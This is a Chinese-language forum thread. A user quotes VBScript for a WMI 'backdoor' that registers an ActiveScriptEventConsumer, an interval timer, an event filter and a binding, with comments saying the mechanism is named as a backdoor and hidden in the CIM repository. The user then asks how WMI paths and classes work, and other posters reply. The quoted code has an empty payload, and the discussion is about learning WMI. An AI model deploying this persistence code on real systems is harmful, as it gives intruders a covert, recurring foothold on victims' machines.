VBS脚本“三无后门”的几个问题 [已解决]

wankoilz

我看了Demon的博客里面“三无后门”的代码后有几个问题，还请指导一下：
代码来自http://demon.tw/copy-paste/vbs-wmi-trojan-3.html：

1. '一个绑定事件和ASEC的实例。
   
2. 
   
3. Function InstallUpdateableTrojan
   
4. WMILink="winmgmts:\\.\root\cimv2:" 'ASEC所在的名称空间
   
5. TrojanName="ScriptKids" '自定义的消费者名字，也就是你的后门的名字
   
6. TrojanRunTimer=30000 '自定义的脚本运行间隔
   
7. 
   
8. strtxt="" '自定义的脚本内容。为了隐蔽我们就不用scriptfilename了。会被Windows编码后写入CIM存储库
   
9. 
   
10. '配置事件消费者'
    
11. set Asec=getobject(WMILink&"ActiveScriptEventConsumer").spawninstance_
    
12. Asec.name=TrojanName&"_consumer"
    
13. Asec.scriptingengine="vbscript"
    
14. Asec.scripttext=strtxt
    
15. set Asecpath=Asec.put_
    
16. 
    
17. '配置计时器'
    
18. set WMITimer=getobject(WMILink&"__IntervalTimerInstruction").spawninstance_
    
19. WMITimer.timerid=TrojanName&"_WMITimer"
    
20. WMITimer.intervalbetweenevents=TrojanRunTimer
    
21. WMITimer.skipifpassed=false
    
22. WMITimer.put_
    
23. 
    
24. '配置事件过滤器'
    
25. set EventFilter=getobject(WMILink&"__EventFilter").spawninstance_
    
26. EventFilter.name=TrojanName&"_filter"
    
27. EventFilter.query="select * from __timerevent where timerid="""&TrojanName&"_WMITimer"""
    
28. EventFilter.querylanguage="wql"
    
29. set FilterPath=EventFilter.put_
    
30. 
    
31. '绑定消费者和过滤器'
    
32. set Binds=getobject(WMILink&"__FilterToConsumerBinding").spawninstance_
    
33. Binds.consumer=Asecpath.path
    
34. Binds.filter=FilterPath.path
    
35. Binds.put_
    
36. 
    
37. End Function

复制代码

问题1
里面出现了 set Asec=getobject(WMILink&"ActiveScriptEventConsumer").spawninstance_ 这种路径写法，
为什么获取其他实例比如 win32_process 时写成
set objprocesses=getobject("winmgmts:\\.\root\cimv2:win32_process").spawninstance_这样不行呢？
是因为 ActiveScriptEventConsumer 属于系统类吗？
还有，http://bbs.bathome.net/thread-21979-1-1.html 这里居然有 getobject("winmgmts:win32_process").instances_ 这种写法... ...
感觉真是太灵活了吧，有点头大... ...

问题2
set Asecpath=Asec.put_   其中 Asecpath 是一个什么对象呢？我知道这是为了获取它的 path 属性，但它和 Asec 这个对象有什么关系呢？

问题3
看了这个问题大家不要见笑啊，既然专门设计一个绑定的类，为什么不直接设计成绑定 具体事件和消费者 ，而要整成绑定 过滤出来的事件和消费者呢... ...
直接绑定 事件id和消费者id  不就可以了吗，是不是多此一举呢？
勿怪！

wankoilz

补问一个：
__eventconsumer和ASEC有什么区别呢？

wankoilz

通过反复学习 《WMI入门教程》(三部分)，以上问题基本上解决了。
http://demon.tw/programming/wmi-scripting-primer-part-1.html

czjt1234

朋友，你倒把你的心得体会说一下啊~

wankoilz

这个真是一言难尽啊，我觉得应该要把WMI基本结构模型，类定义，WMI脚本库（就是入门三部曲）等概念搞清楚，结合wbemtest.exe查看相应类定义的方法、属性、限定符等才能够系统了解。
Demon兄的博客还是很严谨很专业的，看了不后悔！